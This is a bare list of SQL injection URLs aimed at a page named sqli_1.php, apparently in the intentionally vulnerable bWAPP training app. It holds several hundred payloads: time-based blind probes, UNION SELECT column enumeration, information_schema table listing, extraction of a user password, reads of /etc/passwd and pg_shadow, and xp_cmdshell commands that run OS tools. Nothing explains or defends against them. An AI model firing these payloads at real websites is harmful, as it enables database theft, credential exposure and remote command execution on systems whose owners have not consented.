sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
sqli_1.php?title=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
sqli_1.php?title=,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
sqli_1.php?title=,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
sqli_1.php?title=,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
sqli_1.php?title=,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,@@version
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,@@version--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,database()
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,database()--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,user()
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,user()--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,@@version,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,@@version,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,database(),10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,database(),10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,user(),10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,user(),10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,@@version,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,@@version,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,database(),9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,database(),9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,user(),9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,user(),9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,@@version,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,@@version,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,database(),8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,database(),8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,user(),8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,user(),8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,@@version,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,@@version,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,database(),7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,database(),7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,user(),7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,5,user(),7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,@@version,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,@@version,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,database(),6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,database(),6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,user(),6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,4,user(),6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,@@version,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,@@version,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,database(),5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,database(),5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,user(),5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,3,user(),5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,@@version,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,@@version,4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,database(),4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,database(),4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,user(),4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,2,user(),4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3,4--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,@@version,3--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,database(),3,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,database(),3,4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,table_name,2%20from%20information_schema.tables
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,table_name,2%20from%20information_schema.tables--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4%20from%20information_schema.tables
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4%20from%20information_schema.tables--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4,5%20from%20information_schema.tables
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4,5%20from%20information_schema.tables--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,user(),3,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%201,user(),3,4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8.9
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8.9--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3,4--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2,3--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version,2--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20@@version--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20database()
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20database(),2,3,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20database(),2,3,4,5,6,7,8,9,10--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20database()--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20table_name,2%20from%20information_schema.tables
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20table_name,2%20from%20information_schema.tables--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20table_name,2,3%20from%20information_schema.tables
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20table_name,2,3%20from%20information_schema.tables--
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20user(),2,3,4,5,6,7,8,9,10
sqli_1.php?title=0'%20UNION%20SELECT%20ALL%20user(),2,3,4,5,6,7,8,9,10--
sqli_1.php?title=1
sqli_1.php?title=1%20and%201=1
sqli_1.php?title=1%20and%20user_name()%20=%20'dbo'
sqli_1.php?title=1%20exec%20sp_%20(or%20exec%20xp_)
sqli_1.php?title=1%20or%201=1
sqli_1.php?title=1%20uni/**/on%20select%20all%20from%20where
sqli_1.php?title=1%20union%20all%20select%201,2,3,4,5,6,name%20from%20sysobjects%20where%20xtype%20=%20'u'%20--
sqli_1.php?title=1'%20and%201=(select%20count(*)%20from%20tablenames);%20--
sqli_1.php?title=1'%20and%20non_existant_table%20=%20'1
sqli_1.php?title=1'%20or%20'1'='1
sqli_1.php?title=1'1
sqli_1.php?title=1\'1
sqli_1.php?title=\';%20desc%20users;%20--
sqli_1.php?title=and%200=benchmark(3000000,MD5(1))%20%23
sqli_1.php?title=and%200=benchmark(3000000,MD5(1))%20--
sqli_1.php?title=and%200=benchmark(3000000,MD5(1))%20/*
sqli_1.php?title=copy%20myfile%20from%20'/etc/passwd';
sqli_1.php?title=create%20table%20myfile%20(input%20TEXT);
sqli_1.php?title=create%20table%20myfile%20(line%20varchar(8000))"%20bulk%20insert%20foo%20from%20'c:\inetpub\wwwroot\auth.aspâ'"%20select%20*%20from%20myfile"--
sqli_1.php?title=exec%20master..xp_cmdshell%20'ipconfig+/all'
sqli_1.php?title=exec%20master..xp_cmdshell%20'net+users'
sqli_1.php?title=exec%20master..xp_cmdshell%20'net+view'
sqli_1.php?title=hello%20world',(select%20*%20from%20bWAPP.users%20where%20id=1%20limit%200,1))
sqli_1.php?title=hello%20world',(select%20*%20from%20bWAPP.users%20where%20id=1%20limit%200,1))--
sqli_1.php?title=hello%20world',(select%20*%20from%20databases()%20where%20id=1%20limit%200,1))
sqli_1.php?title=hello%20world',(select%20*%20from%20databases()%20where%20id=1%20limit%200,1))--
sqli_1.php?title=hello%20world',(select%20@@datadir))
sqli_1.php?title=hello%20world',(select%20@@datadir))--
sqli_1.php?title=hello%20world',(select%20@@version))
sqli_1.php?title=hello%20world',(select%20@@version))--
sqli_1.php?title=hello%20world',(select%20databases()))
sqli_1.php?title=hello%20world',(select%20databases()))--
sqli_1.php?title=hello%20world',(select%20password%20from%20bWAPP.users%20where%20id=1%20limit%200,1))
sqli_1.php?title=hello%20world',(select%20password%20from%20bWAPP.users%20where%20id=1%20limit%200,1))--
sqli_1.php?title=hello%20world',(select%20system_user())
sqli_1.php?title=hello%20world',(select%20system_user())--
sqli_1.php?title=hello%20world',(select%20user()))
sqli_1.php?title=hello%20world',(select%20user()))--
sqli_1.php?title=select%20*%20from%20master..sysserverse
sqli_1.php?title=select%20*%20from%20myfile;copy%20myfile%20to%20/tmp/test;
sqli_1.php?title=select%20*%20from%20pg_group;
sqli_1.php?title=select%20*%20from%20pg_shadow;
sqli_1.php?title=select%20*%20from%20sysusers
sqli_1.php?title=select%20@@microsoftversione
sqli_1.php?title=select%20@@servernamee
sqli_1.php?title=select%20@@version
sqli_1.php?title=select%20current_database();
sqli_1.php?title=select%20current_setting('config_file');
sqli_1.php?title=select%20current_setting('data_directory');
sqli_1.php?title=select%20current_setting('hba_file');
sqli_1.php?title=select%20current_setting('krb_server_keyfile');
sqli_1.php?title=select%20current_setting('log_connections');
sqli_1.php?title=select%20current_setting('log_statement');
sqli_1.php?title=select%20current_setting('password_encryption');
sqli_1.php?title=select%20current_setting('port');
sqli_1.php?title=select%20current_setting('virtual_host');
sqli_1.php?title=select%20current_user;
sqli_1.php?title=select%20session_user;
sqli_1.php?title=select%20version();
sqli_1.php?title=waitfor%20delay%20'0:0:20'%20--
sqli_1.php?title=waitfor%20delay%20'0:0:20'%20/*
sqli_1.php?title=﻿'%20or%201=1%20
sqli_1.php?title=﻿'%20or%201=1%20--
sqli_1.php?title=﻿';%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'--